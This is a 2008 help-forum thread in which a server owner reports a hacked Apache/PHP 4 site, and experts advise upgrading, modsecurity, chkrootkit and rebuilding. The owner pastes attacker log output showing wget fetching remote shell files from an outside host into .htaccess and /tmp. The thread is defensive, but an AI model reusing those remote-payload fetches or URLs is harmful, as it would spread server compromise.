Solved

Server hacked, .htaccess file was changed

Posted on 2008-06-24
15
738 Views
Last Modified: 2013-11-15
Hi experts,

I have a dedicated server with godaddy. It was attacked 3 times this morning. The .htaccess file on the server was modified and redirected to other ip: 64.28.191.117. It seems they are able to write anything to my server.
The following is the error log I got. It seems to be very helpful, but I still cannot figure out what's the hole and what I should do. Thanks a lot!

[-] prtctl: Invalid argument

[-] prtctl: Invalid argument

--06:09:21--  http://www.dr-schwab.de/shell2.txt

           => `/home/myweb/public_html/.htaccess'

Resolving www.dr-schwab.de... 82.165.104.215

Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 210 [text/plain]
 

    0K                                                       100%   33.38 MB/s
 

06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]

Open in new window

0
Comment
Question by:z_ruixiang
  • 7
  • 6
  • 2
15 Comments
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856284
If this is some sort of NIX you can change your permission on the file to read only.

Casey
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856374
That doesn't help if there is an application that is vulnerable.

Are you using PHP?  What version?  What version of Apache?

Has GoDaddy been notified?
0
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856459
That is right because you can write code to change the file modes....

Casey
0
 

Author Comment

by:z_ruixiang
ID: 21856566
I have changed all the files to read only, but it didn't help.
Apache/2.0.52  running on CentOS 4.
PHP Version 4.3.9
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856630
Upgrade Apache and PHP.  Run modsecurity.  Don't walk to the task, run -- before it is too late.
0
 

Author Comment

by:z_ruixiang
ID: 21856736
Will this upgrading really help? Do I need to change my code if upgraded to PHP5?
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856899
If you are running a release of PHP or whatever that has a security vulnerability, then, YES, you need to upgrade.  If you don't want to go to PHP5, then upgrade to the latest PHP4.  And upgrade Apache while you're at it.  Install modsecurity v2.  Review your apache config file and don't load modules such as proxying, etc if you don't need or use them.
0
How to run any project with ease

Manage projects of all sizes how you want. Great for personal to-do lists, project milestones, team priorities and launch plans.
- Combine task lists, docs, spreadsheets, and chat in one
- View and edit from mobile/offline
- Cut down on emails

 

Author Comment

by:z_ruixiang
ID: 21857153
Based on the log info, can we tell whether it's because of the Apache or PHP version? I mean, I really want to know what and where the hole is, how they could write on my server.
0
 
LVL 28

Accepted Solution

by:
Jan Springer earned 500 total points
ID: 21857372
I'd put my 2 cents on php.  Some interesting reading:

http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/

If it were my machine, I'd scratch it and start over.  But do check that a root kit hasn't been installed -> www.chkrootkit.org.  Look in /tmp for applications and/or data that do not belong.
0
 

Author Comment

by:z_ruixiang
ID: 21857700
I think you are right. I found this in error log:

--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,226 (3.2K) [text/x-csrc]

    0K ...                                                   100%   21.04 KB/s

06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]

And there is an unkown file in my /tmp

Is it a security vulnerability of the PHP I have? I will upgrade it.
0
 

Author Comment

by:z_ruixiang
ID: 21857755
Could you give me some instruction on how to upgrade to php5?
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21857886
The problem with this is that applications could have been re-compiled by the hacker and you most likely have no idea which apps these are.

Move your webserver temporarily somewhere else and re-install is my suggestion.
0
 

Author Comment

by:z_ruixiang
ID: 21857961
I ran "yum update php", but it seems 4.3.9 is the latest version I can get.
0
 

Author Comment

by:z_ruixiang
ID: 21877321
What should I do to prevent it from being attacked if I get a new server? I'm not sure whether they still do that if I move to a totally new server.
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21877468
1) install all of the latest versions of kernel and apps
2) keep a spreadsheet of current OS and application versions installed
3) subscribe to bugtraq at www.securityfocus.com
4) run modsecurity v2 with Apache 2.2.x
5) use iptables
6) periodically update and run chkrootkit -> www.chkrootkit.org
7) turn globals off in php
8) sanitize input variables to scripts and cgis
0

Featured Post

What Should I Do With This Threat Intelligence?

Are you wondering if you actually need threat intelligence? The answer is yes. We explain the basics for creating useful threat intelligence.

Join & Write a Comment

Suggested Solutions

SHARE your personal details only on a NEED to basis. Take CHARGE and SECURE your IDENTITY. How do I then PROTECT myself and stay in charge of my own Personal details (and) - MY own WAY...
This story has been written with permission from the scammed victim, a valued client of mine – identity protected by request.
The viewer will learn how to create multiple layers to apply various filters and how to delete areas from each layer’s filter.
Using Adobe Premiere Pro, the viewer will learn how to set up a sequence with proper settings, importing pictures, rendering, and exporting the finished product.

708 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

17 Experts available now in Live!

Get 1:1 Help Now